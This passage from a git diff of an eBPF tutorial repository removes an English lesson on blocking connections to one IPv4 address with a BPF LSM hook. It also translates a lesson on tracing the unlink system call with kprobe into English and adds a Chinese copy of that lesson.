宏指出该程序期望的挂载点; ++ 程序通过 `BPF_PROG` 宏定义(详情可查看 [tools/lib/bpf/bpf_tracing.h](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/tree/tools/lib/bpf/bpf_tracing.h)); ++ `restrict_connect` 是 `BPF_PROG` 宏要求的程序名; ++ `ret` 是该挂载点上(潜在的)当前函数之前的 LSM 检查程序的返回值; + +整个程序的思路不难理解: + ++ 首先,若其他安全检查函数返回值不为 0(不通过),则无需检查,直接返回不通过; ++ 接下来,判断是否为 IPV4 的连接请求,并比较试图连接的地址是否为 1.1.1.1; ++ 若请求地址为 1.1.1.1 则拒绝连接,否则允许连接; + +在程序运行期间,所有通过 socket 的连接操作都会被输出到 `/sys/kernel/debug/tracing/trace_pipe`。 + +## 编译运行 + +通过容器编译: + +```console +docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest +``` + +或是通过 `ecc` 编译: + +```console +$ ecc lsm-connect.bpf.c +Compiling bpf object... +Packing ebpf object and config into package.json... +``` + +并通过 `ecli` 运行: + +```shell +sudo ecli run package.json +``` + +接下来,可以打开另一个 terminal,并尝试访问 1.1.1.1: + +```console +$ ping 1.1.1.1 +ping: connect: Operation not permitted +$ curl 1.1.1.1 +curl: (7) Couldn't connect to server +$ wget 1.1.1.1 +--2023-04-23 08:41:18-- (try: 2) http://1.1.1.1/ +Connecting to 1.1.1.1:80... failed: Operation not permitted. +Retrying. +``` + +同时,我们可以查看 `bpf_printk` 的输出: + +```console +$ sudo cat /sys/kernel/debug/tracing/trace_pipe + ping-7054 [000] d...1 6313.430872: bpf_trace_printk: lsm: found connect to 16843009 + ping-7054 [000] d...1 6313.430874: bpf_trace_printk: lsm: blocking 16843009 + curl-7058 [000] d...1 6316.346582: bpf_trace_printk: lsm: found connect to 16843009 + curl-7058 [000] d...1 6316.346584: bpf_trace_printk: lsm: blocking 16843009 + wget-7061 [000] d...1 6318.800698: bpf_trace_printk: lsm: found connect to 16843009 + wget-7061 [000] d...1 6318.800700: bpf_trace_printk: lsm: blocking 16843009 +``` + +完整源代码: + +## 总结 + +本文介绍了如何使用 BPF LSM 来限制通过 socket 对特定 IPv4 地址的访问。我们可以通过修改 GRUB 配置文件来开启 LSM 的 BPF 挂载点。在 eBPF 程序中,我们通过 `BPF_PROG` 宏定义函数,并通过 `SEC` 宏指定挂载点;在函数实现上,遵循 LSM 安全检查模块中 "cannot override a denial" 的原则,并根据 socket 连接请求的目的地址对该请求进行限制。 + +如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 + +## 参考 + ++ ++ diff --git a/src/19-lsm-connect/README_en.md b/src/19-lsm-connect/README_en.md deleted file mode 100644 index 67f89c8..0000000 --- a/src/19-lsm-connect/README_en.md +++ /dev/null @@ -1,170 +0,0 @@ -# eBPF Tutorial by Example 19: Security Detection and Defense using LSM - -eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool widely used in the Linux kernel. eBPF allows developers to dynamically load, update, and run user-defined code without restarting the kernel or modifying the kernel source code. This feature enables eBPF to provide high flexibility and performance, making it widely applicable in network and system performance analysis. The same applies to eBPF applications in security, and this article will introduce how to use the eBPF LSM (Linux Security Modules) mechanism to implement a simple security check program. - -## Background - -LSM has been an official security framework in the Linux kernel since Linux 2.6, and security implementations based on it include SELinux and AppArmor. With the introduction of BPF LSM in Linux 5.7, system developers have been able to freely implement function-level security checks. This article provides an example of limiting access to a specific IPv4 address through the socket connect function using a BPF LSM program. (This demonstrates its high control precision.) - -## Overview of LSM - -LSM (Linux Security Modules) is a framework in the Linux kernel that supports various computer security models. LSM predefines a set of hook points on critical paths related to Linux kernel security, decoupling the kernel from security modules. This allows different security modules to be loaded/unloaded in the kernel freely without modifying the existing kernel code, thus enabling them to provide security inspection features. - -In the past, using LSM mainly involved configuring existing security modules like SELinux and AppArmor or writing custom kernel modules. However, with the introduction of the BPF LSM mechanism in Linux 5.7, everything changed. Now, developers can write custom security policies using eBPF and dynamically load them into the LSM mount points in the kernel without configuring or writing kernel modules. - -Some of the hook points currently supported by LSM include: - -+ File open, creation, deletion, and movement; -+ Filesystem mounting; -+ Operations on tasks and processes; -+ Operations on sockets (creating, binding sockets, sending and receiving messages, etc.); - -For more hook points, refer to [lsm_hooks.h](https://github.com/torvalds/linux/blob/master/include/linux/lsm_hooks.h). - -## Verifying BPF LSM Availability - -First, please confirm that your kernel version is higher than 5.7. Next, you can use the following command to check if BPF LSM support is enabled: - -```console -$ cat /boot/config-$(uname -r) | grep BPF_LSM -CONFIG_BPF_LSM=y -``` - -If the output contains `CONFIG_BPF_LSM=y`, BPF LSM is supported. Provided that the above conditions are met, you can use the following command to check if the output includes the `bpf` option: - -```console -$ cat /sys/kernel/security/lsm -ndlock,lockdown,yama,integrity,apparmor -``` - -If the output does not include the `bpf` option (as in the example above), you can modify `/etc/default/grub`: - -```conf -GRUB_CMDLINE_LINUX="lsm=ndlock,lockdown,yama,integrity,apparmor,bpf" -``` - -Then, update the grub configuration using the `update-grub2` command (the corresponding command may vary depending on the system), and restart the system. - -## Writing eBPF Programs - -```C -// lsm-connect.bpf.c -#include "vmlinux.h" -#include -#include -#include - -char LICENSE[] SEC("license") = "GPL"; - -#define EPERM 1 -#define AF_INET 2 - -const __u32 blockme = 16843009; // 1.1.1.1 -> int - -SEC("lsm/socket_connect") -int BPF_PROG(restrict_connect, struct socket *sock, struct sockaddr *address, int addrlen, int ret) -{ - // Satisfying "cannot override a denial" rule - if (ret != 0) - { - return ret; - } - - // Only IPv4 in this example - if (address->sa_family != AF_INET) - { - return 0; - } - - // Cast the address to an IPv4 socket address - struct sockaddr_in *addr = (struct sockaddr_in *)address; - - // Where do you want to go? - __u32 dest = addr->sin_addr.s_addr; - bpf_printk("lsm: found connect to %d", dest); - - if (dest == blockme) - { - bpf_printk("lsm: blocking %d", dest); - return -EPERM; - } - return 0; -} -``` - -This is eBPF code implemented in C on the kernel side. It blocks all connection operations through a socket to 1.1.1.1. The following information is included: - -+ The `SEC("lsm/socket_connect")` macro indicates the expected mount point for this program. -+ The program is defined by the `BPF_PROG` macro (see [tools/lib/bpf/bpf_tracing.h](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/tree/tools/lib/bpf/bpf_tracing.h) for details). -+ `restrict_connect` is the program name required by the `BPF_PROG` macro. -+ `ret` is the return value of the LSM check program (potential) before the current function on this mount point. - -The overall idea of the program is not difficult to understand: - -+ First, if the return value of other security check functions is non-zero (failed), there is no need to check further and the connection is rejected. -+ Next, it determines whether it is an IPv4 connection request and compares the address being connected to with 1.1.1.1. -+ If the requested address is 1.1.1.1, the connection is blocked; otherwise, the connection is allowed. - -During the execution of the program, all connection operations through a socket will be output to `/sys/kernel/debug/tracing/trace_pipe`. - -## Compilation and Execution - -Compile using a container: - -```console -docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest -``` - -Or compile using `ecc`: - -```console -$ ecc lsm-connect.bpf.c -Compiling bpf object... -Packing ebpf object and config into package.json... -``` - -And run using `ecli`: - -```shell -sudo ecli run package.json -``` - -Next, open another terminal and try to access 1.1.1.1: - -```console -$ ping 1.1.1.1 -ping: connect: Operation not permitted -$ curl 1.1.1.1 -curl: (7) Couldn't connect to server -$ wget 1.1.1.1 ---2023-04-23 08:41:18-- (try: 2) http://1.1.1.1/ -Connecting to 1.1.1.1:80... failed: Operation not permitted. -Retrying. -``` - -At the same time, we can view the output of `bpf_printk`: - -```console -$ sudo cat /sys/kernel/debug/tracing/trace_pipe - ping-7054 [000] d...1 6313.430872: bpf_trace_printk: lsm: found connect to 16843009 - ping-7054 [000] d...1 6313.430874: bpf_trace_printk: lsm: blocking 16843009 - curl-7058 [000] d...1 6316.346582: bpf_trace_printk: lsm: found connect to 16843009 - curl-7058 [000] d...1 6316.346584: bpf_trace_printk: lsm: blocking 16843009".``` -wget-7061 [000] d...1 6318.800698: bpf_trace_printk: lsm: found connect to 16843009 -wget-7061 [000] d...1 6318.800700: bpf_trace_printk: lsm: blocking 16843009 -``` - -Complete source code: - -## Summary - -This article introduces how to use BPF LSM to restrict access to a specific IPv4 address through a socket. We can enable the LSM BPF mount point by modifying the GRUB configuration file. In the eBPF program, we define functions using the `BPF_PROG` macro and specify the mount point using the `SEC` macro. In the implementation of the function, we follow the principle of "cannot override a denial" in the LSM security-checking module and restrict the socket connection request based on the destination address of the request. - -If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at or website for more examples and complete tutorials. - -## References - -+ -+ - -> The original link of this article: diff --git a/src/2-kprobe-unlink/README.md b/src/2-kprobe-unlink/README.md index ca835b0..139aa5c 100644 --- a/src/2-kprobe-unlink/README.md +++ b/src/2-kprobe-unlink/README.md @@ -1,35 +1,36 @@ -# eBPF 入门开发实践教程二:在 eBPF 中使用 kprobe 监测捕获 unlink 系统调用 +# eBPF Tutorial by Example 2: Monitoring unlink System Calls with kprobe -eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 +eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel. It allows developers to dynamically load, update, and run user-defined code at runtime. -本文是 eBPF 入门开发实践教程的第二篇,在 eBPF 中使用 kprobe 捕获 unlink 系统调用。本文会先讲解关于 kprobes 的基本概念和技术背景,然后介绍如何在 eBPF 中使用 kprobe 捕获 unlink 系统调用。 +This article is the second part of the eBPF Tutorial by Example, focusing on using kprobe to capture the unlink system call in eBPF. The article will first explain the basic concepts and technical background of kprobes, and then introduce how to use kprobe to capture the unlink system call in eBPF. -## kprobes 技术背景 +## Background of kprobes Technology -开发人员在内核或者模块的调试过程中,往往会需要要知道其中的一些函数有无被调用、何时被调用、执行是否正确以及函数的入参和返回值是什么等等。比较简单的做法是在内核代码对应的函数中添加日志打印信息,但这种方式往往需要重新编译内核或模块,重新启动设备之类的,操作较为复杂甚至可能会破坏原有的代码执行过程。 +During the debugging process of the kernel or modules, developers often need to know whether certain functions are called, when they are called, whether the execution is correct, and what the input and return values of the functions are. A simple approach is to add log print information to the corresponding functions in the kernel code. However, this approach often requires recompiling the kernel or modules, restarting the device, etc., which is complex and may disrupt the original code execution process. -而利用 kprobes 技术,用户可以定义自己的回调函数,然后在内核或者模块中几乎所有的函数中(有些函数是不可探测的,例如kprobes自身的相关实现函数,后文会有详细说明)动态地插入探测点,当内核执行流程执行到指定的探测函数时,会调用该回调函数,用户即可收集所需的信息了,同时内核最后还会回到原本的正常执行流程。如果用户已经收集足够的信息,不再需要继续探测,则同样可以动态地移除探测点。因此 kprobes 技术具有对内核执行流程影响小和操作方便的优点。 +By using the kprobes technology, users can define their own callback functions and dynamically insert probes into almost all functions in the kernel or modules (some functions cannot be probed, such as the kprobes' own implementation functions, which will be explained in detail later). When the kernel execution flow reaches the specified probe function, it will invoke the callback function, allowing the user to collect the desired information. The kernel will then return to the normal execution flow. If the user has collected sufficient information and no longer needs to continue probing, the probes can be dynamically removed. Therefore, the kprobes technology has the advantages of minimal impact on the kernel execution flow and easy operation. -kprobes 技术包括的3种探测手段分别时 kprobe、jprobe 和 kretprobe。首先 kprobe 是最基本的探测方式,是实现后两种的基础,它可以在任意的位置放置探测点(就连函数内部的某条指令处也可以),它提供了探测点的调用前、调用后和内存访问出错3种回调方式,分别是 `pre_handler`、`post_handler` 和 `fault_handler`,其中 `pre_handler` 函数将在被探测指令被执行前回调,`post_handler` 会在被探测指令执行完毕后回调(注意不是被探测函数),`fault_handler` 会在内存访问出错时被调用;jprobe 基于 kprobe 实现,它用于获取被探测函数的入参值;最后 kretprobe 从名字中就可以看出其用途了,它同样基于 kprobe 实现,用于获取被探测函数的返回值。 +The kprobes technology includes three detection methods: kprobe, jprobe, and kretprobe. First, kprobe is the most basic detection method and serves as the basis for the other two. It allows probes to be placed at any position (including within a function). It provides three callback modes for probes: `pre_handler`, `post_handler`, and `fault_handler`. The `pre_handler` function is called before the probed instruction is executed, the `post_handler` is called after the probed instruction is completed (note that it is not the probed function), and the `fault_handler` is called when a memory access error occurs. The jprobe is based on kprobe and is used to obtain the input values of the probed function. Finally, as the name suggests, kretprobe is also based on kprobe and is used to obtain the return values of the probed function. -kprobes 的技术原理并不仅仅包含纯软件的实现方案,它也需要硬件架构提供支持。其中涉及硬件架构相关的是 CPU 的异常处理和单步调试技术,前者用于让程序的执行流程陷入到用户注册的回调函数中去,而后者则用于单步执行被探测点指令,因此并不是所有的架构均支持 kprobes。目前 kprobes 技术已经支持多种架构,包括 i386、x86_64、ppc64、ia64、sparc64、arm、ppc 和 mips(有些架构实现可能并不完全,具体可参考内核的 Documentation/kprobes.txt)。 +The kprobes technology is not only implemented through software but also requires support from the hardware architecture. This involves CPU exception handling and single-step debugging techniques. The former is used to make the program's execution flow enter the user-registered callback function, and the latter is used to single-step execute the probed instruction. Therefore, not all architectures support kprobes. Currently, kprobes technology supports various architectures, including i386, x86_64, ppc64, ia64, sparc64, arm, ppc, and mips (note that some architecture implementations may not be complete, see the kernel's Documentation/kprobes.txt for details). -kprobes 的特点与使用限制: +Features and Usage Restrictions of kprobes: -1. kprobes 允许在同一个被探测位置注册多个 kprobe,但是目前 jprobe 却不可以;同时也不允许以其他的 jprobe 回调函数和 kprobe 的 `post_handler` 回调函数作为被探测点。 -2. 一般情况下,可以探测内核中的任何函数,包括中断处理函数。不过在 kernel/kprobes.c 和 arch/*/kernel/kprobes.c 程序中用于实现 kprobes 自身的函数是不允许被探测的,另外还有`do_page_fault` 和 `notifier_call_chain`; -3. 如果以一个内联函数为探测点,则 kprobes 可能无法保证对该函数的所有实例都注册探测点。由于 gcc 可能会自动将某些函数优化为内联函数,因此可能无法达到用户预期的探测效果; -4. 一个探测点的回调函数可能会修改被探测函数的运行上下文,例如通过修改内核的数据结构或者保存与`struct pt_regs`结构体中的触发探测器之前寄存器信息。因此 kprobes 可以被用来安装 bug 修复代码或者注入故障测试代码; -5. kprobes 会避免在处理探测点函数时再次调用另一个探测点的回调函数,例如在`printk()`函数上注册了探测点,而在它的回调函数中可能会再次调用`printk`函数,此时将不再触发`printk`探测点的回调,仅仅是增加了`kprobe`结构体中`nmissed`字段的数值; -6. 在 kprobes 的注册和注销过程中不会使用 mutex 锁和动态的申请内存; -7. kprobes 回调函数的运行期间是关闭内核抢占的,同时也可能在关闭中断的情况下执行,具体要视CPU架构而定。因此不论在何种情况下,在回调函数中不要调用会放弃 CPU 的函数(如信号量、mutex 锁等); -8. kretprobe 通过替换返回地址为预定义的 trampoline 的地址来实现,因此栈回溯和 gcc 内嵌函数`__builtin_return_address()`调用将返回 trampoline 的地址而不是真正的被探测函数的返回地址; -9. 如果一个函数的调用次数和返回次数不相等,则在类似这样的函数上注册 kretprobe 将可能不会达到预期的效果,例如`do_exit()`函数会存在问题,而`do_execve()`函数和`do_fork()`函数不会; -10. 当在进入和退出一个函数时,如果 CPU 运行在非当前任务所有的栈上,那么往该函数上注册 kretprobe 可能会导致不可预料的后果,因此,kprobes 不支持在 X86_64 的结构下为`__switch_to()`函数注册 kretprobe,将直接返回`-EINVAL`。 +1. kprobes allows multiple kprobes to be registered at the same probe position, but jprobe currently does not support this. It is also not allowed to use other jprobe callback functions or the `post_handler` callback function of kprobe as probe points. +2. In general, any function in the kernel can be probed, including interrupt handlers. However, the functions used to implement kprobes themselves in kernel/kprobes.c and arch/*/kernel/kprobes.c are not allowed to be probed. Additionally, `do_page_fault` and `notifier_call_chain` are also not allowed. +3. If an inline function is used as a probe point, kprobes may not be able to guarantee that probe points are registered for all instances of that function. Since gcc may automatically optimize certain functions as inline functions, the desired probing effect may not be achieved. +4. The callback function of a probe point may modify the runtime context of the probed function, such as by modifying the kernel's data structure or saving register information before triggering the prober in the `struct pt_regs` structure. Therefore, kprobes can be used to install bug fixes or inject fault testing code. +5. kprobes avoids calling the callback function of another probe point again when processing the probe point function. For example, if a probe point is registered on the `printk()` function and the callback function may call `printk()` again, the callback for the `printk` probe point will not be triggered again. Only the `nmissed` field in the `kprobe` structure will be incremented. +6. mutex locks and dynamic memory allocation are not used in the registration and removal process of kprobes. -## kprobe 示例 +7. During the execution of kprobes callback functions, kernel preemption is disabled, and it may also be executed with interrupts disabled, which depends on the CPU architecture. Therefore, regardless of the situation, do not call functions that will give up the CPU in the callback function (such as semaphore, mutex lock, etc.); +8. kretprobe is implemented by replacing the return address with the pre-defined trampoline address, so stack backtraces and gcc inline function `__builtin_return_address()` will return the address of the trampoline instead of the actual return address of the probed function; +9. If the number of function calls and return calls of a function are unequal, registering kretprobe on such a function may not achieve the expected effect, for example, the `do_exit()` function will have problems, while the `do_execve()` function and `do_fork()` function will not; +10. When entering and exiting a function, if the CPU is running on a stack that does not belong to the current task, registering kretprobe on that function may have unpredictable consequences. Therefore, kprobes does not support registering kretprobe for the `__switch_to()` function under the X86_64 architecture and will directly return `-EINVAL`. -完整代码如下: +## kprobe Example + +The complete code is as follows: ```c #include "vmlinux.h" @@ -62,9 +63,9 @@ int BPF_KRETPROBE(do_unlinkat_exit, long ret) } ``` -这段代码是一个简单的 eBPF 程序,用于监测和捕获在 Linux 内核中执行的 unlink 系统调用。unlink 系统调用的功能是删除一个文件,这个 eBPF 程序通过使用 kprobe(内核探针)在`do_unlinkat`函数的入口和退出处放置钩子,实现对该系统调用的跟踪。 +This code is a simple eBPF program used to monitor and capture the unlink system call executed in the Linux kernel. The unlink system call is used to delete a file. This eBPF program traces this system call by placing hooks at the entry and exit points of the `do_unlinkat` function using a kprobe (kernel probe). -首先,我们导入必要的头文件,如 vmlinux.h,bpf_helpers.h,bpf_tracing.h 和 bpf_core_read.h。接着,我们定义许可证,以允许程序在内核中运行。 +First, we import necessary header files such as vmlinux.h, bpf_helpers.h, bpf_tracing.h, and bpf_core_read.h. Then, we define a license to allow the program to run in the kernel. ```c #include "vmlinux.h" @@ -75,7 +76,7 @@ int BPF_KRETPROBE(do_unlinkat_exit, long ret) char LICENSE[] SEC("license") = "Dual BSD/GPL"; ``` -接下来,我们定义一个名为`BPF_KPROBE(do_unlinkat)`的 kprobe,当进入`do_unlinkat`函数时,它会被触发。该函数接受两个参数:`dfd`(文件描述符)和`name`(文件名结构体指针)。在这个 kprobe 中,我们获取当前进程的 PID(进程标识符),然后读取文件名。最后,我们使用`bpf_printk`函数在内核日志中打印 PID 和文件名。 +Next, we define a kprobe named `BPF_KPROBE(do_unlinkat)` which gets triggered when the `do_unlinkat` function is entered. It takes two parameters: `dfd` (file descriptor) and `name` (filename structure pointer). In this kprobe, we retrieve the PID (process identifier) of the current process and then read the filename. Finally, we use the `bpf_printk` function to print the PID and filename in the kernel log. ```c SEC("kprobe/do_unlinkat") @@ -91,7 +92,7 @@ int BPF_KPROBE(do_unlinkat, int dfd, struct filename *name) } ``` -接下来,我们定义一个名为`BPF_KRETPROBE(do_unlinkat_exit)`的 kretprobe,当从`do_unlinkat`函数退出时,它会被触发。这个 kretprobe 的目的是捕获函数的返回值(ret)。我们再次获取当前进程的 PID,并使用`bpf_printk`函数在内核日志中打印 PID 和返回值。 +Next, we define a kretprobe named `BPF_KRETPROBE(do_unlinkat_exit)` that will be triggered when exiting the `do_unlinkat` function. The purpose of this kretprobe is to capture the return value (`ret`) of the function. We again obtain the PID of the current process and use the `bpf_printk` function to print the PID and return value in the kernel log. ```c SEC("kretprobe/do_unlinkat") @@ -105,9 +106,9 @@ int BPF_KRETPROBE(do_unlinkat_exit, long ret) } ``` -eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。 +eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain that combines with Wasm. Its goal is to simplify the development, build, distribution, and execution of eBPF programs. You can refer to to download and install the ecc compiler toolchain and ecli runtime. -要编译这个程序,请使用 ecc 工具: +To compile this program, use the ecc tool: ```console $ ecc kprobe-link.bpf.c @@ -115,13 +116,13 @@ Compiling bpf object... Packing ebpf object and config into package.json... ``` -然后运行: +Then run: ```console sudo ecli run package.json ``` -在另外一个窗口中: +In another window: ```shell touch test1 @@ -130,7 +131,7 @@ touch test2 rm test2 ``` -在 /sys/kernel/debug/tracing/trace_pipe 文件中,应该能看到类似下面的 kprobe 演示输出: +You should see kprobe demo output similar to the following in the /sys/kernel/debug/tracing/trace_pipe file: ```shell $ sudo cat /sys/kernel/debug/tracing/trace_pipe @@ -140,10 +141,10 @@ $ sudo cat /sys/kernel/debug/tracing/trace_pipe rm-9346 [005] d..4 4710.951895: bpf_trace_printk: KPROBE EXIT: ret = 0 ``` -## 总结 +## Summary -通过本文的示例,我们学习了如何使用 eBPF 的 kprobe 和 kretprobe 捕获 unlink 系统调用。更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档: +In this article's example, we learned how to use eBPF's kprobe and kretprobe to capture the unlink system call. For more examples and detailed development guides, please refer to the official documentation of eunomia-bpf: -本文是 eBPF 入门开发实践教程的第二篇。下一篇文章将介绍如何在 eBPF 中使用 fentry 监测捕获 unlink 系统调用。 +This article is the second part of the introductory eBPF development tutorial. The next article will explain how to use fentry to monitor and capture the unlink system call in eBPF. -如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +If you'd like to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at or website for more examples and complete tutorials. diff --git a/src/2-kprobe-unlink/README.zh.md b/src/2-kprobe-unlink/README.zh.md new file mode 100644 index 0000000..ca835b0 --- /dev/null +++ b/src/2-kprobe-unlink/README.zh.md @@ -0,0 +1,149 @@ +# eBPF 入门开发实践教程二:在 eBPF 中使用 kprobe 监测捕获 unlink 系统调用 + +eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 + +本文是 eBPF 入门开发实践教程的第二篇,在 eBPF 中使用 kprobe 捕获 unlink 系统调用。本文会先讲解关于 kprobes 的基本概念和技术背景,然后介绍如何在 eBPF 中使用 kprobe 捕获 unlink 系统调用。 + +## kprobes 技术背景 + +开发人员在内核或者模块的调试过程中,往往会需要要知道其中的一些函数有无被调用、何时被调用、执行是否正确以及函数的入参和返回值是什么等等。比较简单的做法是在内核代码对应的函数中添加日志打印信息,但这种方式往往需要重新编译内核或模块,重新启动设备之类的,操作较为复杂甚至可能会破坏原有的代码执行过程。 + +而利用 kprobes 技术,用户可以定义自己的回调函数,然后在内核或者模块中几乎所有的函数中(有些函数是不可探测的,例如kprobes自身的相关实现函数,后文会有详细说明)动态地插入探测点,当内核执行流程执行到指定的探测函数时,会调用该回调函数,用户即可收集所需的信息了,同时内核最后还会回到原本的正常执行流程。如果用户已经收集足够的信息,不再需要继续探测,则同样可以动态地移除探测点。因此 kprobes 技术具有对内核执行流程影响小和操作方便的优点。 + +kprobes 技术包括的3种探测手段分别时 kprobe、jprobe 和 kretprobe。首先 kprobe 是最基本的探测方式,是实现后两种的基础,它可以在任意的位置放置探测点(就连函数内部的某条指令处也可以),它提供了探测点的调用前、调用后和内存访问出错3种回调方式,分别是 `pre_handler`、`post_handler` 和 `fault_handler`,其中 `pre_handler` 函数将在被探测指令被执行前回调,`post_handler` 会在被探测指令执行完毕后回调(注意不是被探测函数),`fault_handler` 会在内存访问出错时被调用;jprobe 基于 kprobe 实现,它用于获取被探测函数的入参值;最后 kretprobe 从名字中就可以看出其用途了,它同样基于 kprobe 实现,用于获取被探测函数的返回值。 + +kprobes 的技术原理并不仅仅包含纯软件的实现方案,它也需要硬件架构提供支持。其中涉及硬件架构相关的是 CPU 的异常处理和单步调试技术,前者用于让程序的执行流程陷入到用户注册的回调函数中去,而后者则用于单步执行被探测点指令,因此并不是所有的架构均支持 kprobes。目前 kprobes 技术已经支持多种架构,包括 i386、x86_64、ppc64、ia64、sparc64、arm、ppc 和 mips(有些架构实现可能并不完全,具体可参考内核的 Documentation/kprobes.txt)。 + +kprobes 的特点与使用限制: + +1. kprobes 允许在同一个被探测位置注册多个 kprobe,但是目前 jprobe 却不可以;同时也不允许以其他的 jprobe 回调函数和 kprobe 的 `post_handler` 回调函数作为被探测点。 +2. 一般情况下,可以探测内核中的任何函数,包括中断处理函数。不过在 kernel/kprobes.c 和 arch/*/kernel/kprobes.c 程序中用于实现 kprobes 自身的函数是不允许被探测的,另外还有`do_page_fault` 和 `notifier_call_chain`; +3. 如果以一个内联函数为探测点,则 kprobes 可能无法保证对该函数的所有实例都注册探测点。由于 gcc 可能会自动将某些函数优化为内联函数,因此可能无法达到用户预期的探测效果; +4. 一个探测点的回调函数可能会修改被探测函数的运行上下文,例如通过修改内核的数据结构或者保存与`struct pt_regs`结构体中的触发探测器之前寄存器信息。因此 kprobes 可以被用来安装 bug 修复代码或者注入故障测试代码; +5. kprobes 会避免在处理探测点函数时再次调用另一个探测点的回调函数,例如在`printk()`函数上注册了探测点,而在它的回调函数中可能会再次调用`printk`函数,此时将不再触发`printk`探测点的回调,仅仅是增加了`kprobe`结构体中`nmissed`字段的数值; +6. 在 kprobes 的注册和注销过程中不会使用 mutex 锁和动态的申请内存; +7. kprobes 回调函数的运行期间是关闭内核抢占的,同时也可能在关闭中断的情况下执行,具体要视CPU架构而定。因此不论在何种情况下,在回调函数中不要调用会放弃 CPU 的函数(如信号量、mutex 锁等); +8. kretprobe 通过替换返回地址为预定义的 trampoline 的地址来实现,因此栈回溯和 gcc 内嵌函数`__builtin_return_address()`调用将返回 trampoline 的地址而不是真正的被探测函数的返回地址; +9. 如果一个函数的调用次数和返回次数不相等,则在类似这样的函数上注册 kretprobe 将可能不会达到预期的效果,例如`do_exit()`函数会存在问题,而`do_execve()`函数和`do_fork()`函数不会; +10. 当在进入和退出一个函数时,如果 CPU 运行在非当前任务所有的栈上,那么往该函数上注册 kretprobe 可能会导致不可预料的后果,因此,kprobes 不支持在 X86_64 的结构下为`__switch_to()`函数注册 kretprobe,将直接返回`-EINVAL`。 + +## kprobe 示例 + +完整代码如下: + +```c +#include "vmlinux.h" +#include +#include +#include + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; + +SEC("kprobe/do_unlinkat") +int BPF_KPROBE(do_unlinkat, int dfd, struct filename *name) +{ + pid_t pid; + const char *filename; + + pid = bpf_get_current_pid_tgid() >> 32; + filename = BPF_CORE_READ(name, name); + bpf_printk("KPROBE ENTRY pid = %d, filename = %s\n", pid, filename); + return 0; +} + +SEC("kretprobe/do_unlinkat") +int BPF_KRETPROBE(do_unlinkat_exit, long ret) +{ + pid_t pid; + + pid = bpf_get_current_pid_tgid() >> 32; + bpf_printk("KPROBE EXIT: pid = %d, ret = %ld\n", pid, ret); + return 0; +} +``` + +这段代码是一个简单的 eBPF 程序,用于监测和捕获在 Linux 内核中执行的 unlink 系统调用。unlink 系统调用的功能是删除一个文件,这个 eBPF 程序通过使用 kprobe(内核探针)在`do_unlinkat`函数的入口和退出处放置钩子,实现对该系统调用的跟踪。 + +首先,我们导入必要的头文件,如 vmlinux.h,bpf_helpers.h,bpf_tracing.h 和 bpf_core_read.h。接着,我们定义许可证,以允许程序在内核中运行。 + +```c +#include "vmlinux.h" +#include +#include +#include + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; +``` + +接下来,我们定义一个名为`BPF_KPROBE(do_unlinkat)`的 kprobe,当进入`do_unlinkat`函数时,它会被触发。该函数接受两个参数:`dfd`(文件描述符)和`name`(文件名结构体指针)。在这个 kprobe 中,我们获取当前进程的 PID(进程标识符),然后读取文件名。最后,我们使用`bpf_printk`函数在内核日志中打印 PID 和文件名。 + +```c +SEC("kprobe/do_unlinkat") +int BPF_KPROBE(do_unlinkat, int dfd, struct filename *name) +{ + pid_t pid; + const char *filename; + + pid = bpf_get_current_pid_tgid() >> 32; + filename = BPF_CORE_READ(name, name); + bpf_printk("KPROBE ENTRY pid = %d, filename = %s\n", pid, filename); + return 0; +} +``` + +接下来,我们定义一个名为`BPF_KRETPROBE(do_unlinkat_exit)`的 kretprobe,当从`do_unlinkat`函数退出时,它会被触发。这个 kretprobe 的目的是捕获函数的返回值(ret)。我们再次获取当前进程的 PID,并使用`bpf_printk`函数在内核日志中打印 PID 和返回值。 + +```c +SEC("kretprobe/do_unlinkat") +int BPF_KRETPROBE(do_unlinkat_exit, long ret) +{ + pid_t pid; + + pid = bpf_get_current_pid_tgid() >> 32; + bpf_printk("KPROBE EXIT: pid = %d, ret = %ld\n", pid, ret); + return 0; +} +``` + +eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。 + +要编译这个程序,请使用 ecc 工具: + +```console +$ ecc kprobe-link.bpf.c +Compiling bpf object... +Packing ebpf object and config into package.json... +``` + +然后运行: + +```console +sudo ecli run package.json +``` + +在另外一个窗口中: + +```shell +touch test1 +rm test1 +touch test2 +rm test2 +``` + +在 /sys/kernel/debug/tracing/trace_pipe 文件中,应该能看到类似下面的 kprobe 演示输出: + +```shell +$ sudo cat /sys/kernel/debug/tracing/trace_pipe + rm-9346 [005] d..3 4710.951696: bpf_trace_printk: KPROBE ENTRY pid = 9346, filename = test1 + rm-9346 [005] d..4 4710.951819: bpf_trace_printk: KPROBE EXIT: ret = 0 + rm-9346 [005] d..3 4710.951852: bpf_trace_printk: KPROBE ENTRY pid = 9346, filename = test2 + rm-9346 [005] d..4 4710.951895: bpf_trace_printk: KPROBE EXIT: ret = 0 +``` + +## 总结 + +通过本文的示例,我们学习了如何使用 eBPF 的 